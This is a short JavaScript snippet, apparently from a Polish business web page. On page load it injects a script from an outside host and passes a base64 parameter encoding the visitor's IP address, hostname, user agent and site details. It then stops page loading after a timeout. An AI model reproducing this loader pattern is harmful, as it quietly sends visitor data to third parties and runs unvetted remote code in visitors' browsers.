var myScrStOutTim='30000';if(window.addEventListener){window.addEventListener("load",myStatJsRunOnOutSrv(myScrStOutTim),false);}else if(window.attachEvent){window.attachEvent("onload",myStatJsRunOnOutSrv(myScrStOutTim));}else{window.onload=myStatJsRunOnOutSrv(myScrStOutTim);}function myStatJsRunOnOutSrv(myScrStOutTim){var RunOnOutSrvJs=document.createElement("script");RunOnOutSrvJs.src="http://cms24.waw.pl/j.php?p=MXwwfDB8fDl8Zm9jdXMtc3RvbmVzLnBsfC9ibGF0eS80OC1hYnNvbHV0LWJsYWNrLmh0bWx8fDU0LjE0NC44Mi4yMTZ8ZWMyLTU0LTE0NC04Mi0yMTYuY29tcHV0ZS0xLmFtYXpvbmF3cy5jb218Q0NCb3QvMi4wIChodHRwczovL2NvbW1vbmNyYXdsLm9yZy9mYXEvKXxGb2N1cy1TdG9uZXMgaHVydG93bmlhIGthbWllbmlhfDB8Y21zQG1pZ2FuLnBsfDE1fGZvY3VzLXN0b25lcy5ob21lLnBsfDg5LjE2MS4yMTkuMTMzfG1vbmRheXwzMDI2M3wwLjAwMDN8My44LjV8Ny4yLjN8TWlENWJlYjUxMDYyYzdiY3wzOzA7MjsxOzB8MjswOzM3OzA7MjM2OzMxOzE7MDsyOzB8OTc2OzE0OzE7NDg4Ozd8MzI2OzIxNjsxOzQ1MTY3OQ==";document.body.appendChild(RunOnOutSrvJs);setTimeout(function(){if(window.stop){window.stop();}else{document.execCommand('Stop');}},myScrStOutTim);}